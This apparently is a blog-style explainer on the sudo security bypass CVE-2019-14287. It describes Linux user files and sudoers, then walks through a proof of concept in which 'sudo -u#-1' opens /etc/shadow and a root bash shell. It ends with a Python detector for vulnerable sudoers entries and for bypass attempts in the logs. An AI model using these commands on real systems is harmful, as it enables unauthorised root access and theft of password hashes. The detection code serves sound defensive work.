SUDO Security Bypass Vulnerability – CVE-2019-14287

Vulnerability Details:

Brief description of vulnerability

CVE-2019-14287 is a security policy bypass in sudo that allows a user on a Linux system to execute commands as root even when the user's entry in the sudoers file explicitly prevents those commands from being run as root.

It can be exploited by a user whose Runas specification grants ALL, which means they are allowed to execute commands as any or all users on the system.

This consequently allows such users to run commands and tools as root by specifying the target user ID (UID) as -1, or as the unsigned equivalent of -1, 4294967295:

sudo -u#-1 /usr/bin/id

or, using the unsigned equivalent of -1:

sudo -u#4294967295 /usr/bin/id

Explanation of exploit

What is sudo?

sudo is a command that allows you to run scripts or programs that require administrative privileges. It stands for "super user do".

You can also use the su (switch user) command to switch to the superuser.

How to check sudo version installed?

sudo --version

or

sudo --version | grep version

How user information is stored in Linux

Each user account has a username, a unique identifier (UID), a primary group ID (GID), a home directory, and the default shell to be used when the user logs in to the system.

All user account related information is stored in the passwd file, located at /etc/passwd.

Passwords are not stored in the passwd file itself: the password field holds an x, indicating that the encrypted password is kept elsewhere.

The encrypted passwords for accounts are stored in the shadow file, located at /etc/shadow. The shadow file can only be accessed by the root user.

Structure of user account

username:password:UID:GID:comments:home_directory:shell

The first user in the passwd file is the root account.

The root account always has a UID of 0.

System accounts have a UID of less than 1000, while user accounts have a UID >= 1000.

The sudoers file

The sudoers file contains all the sudo permissions for users and groups on a Linux system. It is found at /etc/sudoers.

The sudoers file should be accessed and modified using visudo.

visudo is a tool that allows you to access and make changes to the sudoers file safely. It does this by ensuring that only one user is editing the sudoers file at a time and by checking the file for syntax errors before saving it.

We will use visudo to demonstrate the exploit.

POC

Whether the bypass works depends on the user's permissions for the commands specified in the sudoers file.

Requirements:

  • The user requires sudo privileges that allow running commands as other user IDs. We will be setting this up in the sudoers file.
  • sudo version <= 1.8.28

1) Create a user on the system.

2) Modify the sudoers file with visudo.

3) Give the user sudo privileges and specify the commands that can be run. The following entry lets alexis run vi as any user except root:

alexis ALL=(ALL, !root) /usr/bin/vi

4) You can also specify a command alias instead of the full path:

Cmnd_Alias VIM = /usr/bin/vi

5) After setting up the permissions, log in as user alexis and run the command:

sudo -u#-1 vi /etc/shadow

6) To confirm the bypass, try running the same command without specifying the UID (this should be refused, since root is excluded):

sudo vi /etc/shadow

This confirms that the UID -1 bypasses the Runas restriction and allows the command to execute as root.

You can also confirm this by running the id command the same way.

7) If the user is allowed to run any command, the same bypass gives a bash shell as root:

alexis ALL=(ALL, !root) ALL

sudo -u#-1 bash
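Two defender-side checks for what the POC above relies on, as an added example in Python that is not part of the original post: one flags sudoers entries of the "(ALL, !root)" shape that the bypass defeats, the other flags sudo log lines whose target user is #-1 or #4294967295. The sudoers fragment and log lines are constructed sample input, and the log parser assumes sudo's default syslog line format (USER=... ; COMMAND=...).

```python
import re
# Constructed sudoers fragment and sudo log lines used as sample input (not from a real host).
SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
alexis ALL=(ALL, !root) /usr/bin/vi
bob ALL=(www-data) /usr/bin/systemctl restart nginx
"""
SAMPLE_LOG = """\
Oct 15 10:01:02 host sudo:   alexis : TTY=pts/0 ; PWD=/home/alexis ; USER=#-1 ; COMMAND=/usr/bin/vi /etc/shadow
Oct 15 10:02:10 host sudo:   alexis : TTY=pts/0 ; PWD=/home/alexis ; USER=root ; COMMAND=/usr/bin/vi /etc/shadow
Oct 15 10:03:33 host sudo:   alexis : TTY=pts/0 ; PWD=/home/alexis ; USER=#4294967295 ; COMMAND=/bin/bash
"""

# sudoers user specification: user host=(runas_users[:runas_groups]) commands
SPEC_RE = re.compile(r'^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$')
# sudo's default syslog line: "sudo: <user> : ... USER=<target> ; COMMAND=<cmd>"
LOG_RE = re.compile(r'sudo:\s+(?P<user>\S+)\s*:.*?USER=(?P<target>\S+)\s*;.*?COMMAND=(?P<cmd>.*)$')
BYPASS_TARGETS = {'#-1', '#4294967295'}  # -1 and its unsigned 32-bit equivalent

def vulnerable_runas_specs(sudoers_text):
    """Return (user, runas, commands) for entries that grant ALL Runas users but
    exclude root only by negation: the shape that UID -1 bypasses."""
    hits = []
    for raw in sudoers_text.splitlines():
        line = re.sub(r'(^|\s)#.*$', '', raw).strip()  # drop comments but keep '!#0'
        m = SPEC_RE.match(line)
        if not m:
            continue
        users = [u.strip() for u in m['runas'].split(':')[0].split(',')]
        if 'ALL' in users and any(u in ('!root', '!#0') for u in users):
            hits.append((m['user'], m['runas'].strip(), m['cmds'].strip()))
    return hits

def bypass_attempts(log_text):
    """Return (invoking user, target, command) for log lines whose target UID is
    -1 or 4294967295, the values that trigger the bypass."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if m and m['target'] in BYPASS_TARGETS:
            hits.append((m['user'], m['target'], m['cmd'].strip()))
    return hits

if __name__ == '__main__':
    for user, runas, cmds in vulnerable_runas_specs(SAMPLE_SUDOERS):
        print(f'risky Runas spec: {user} may run {cmds} as ({runas})')
    for user, target, cmd in bypass_attempts(SAMPLE_LOG):
        print(f'bypass attempt: {user} targeted USER={target} running {cmd}')
```

On a real host, feed it the output of visudo -c or the contents of /etc/sudoers and /etc/sudoers.d/*, and the sudo lines from /var/log/auth.log or journalctl.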
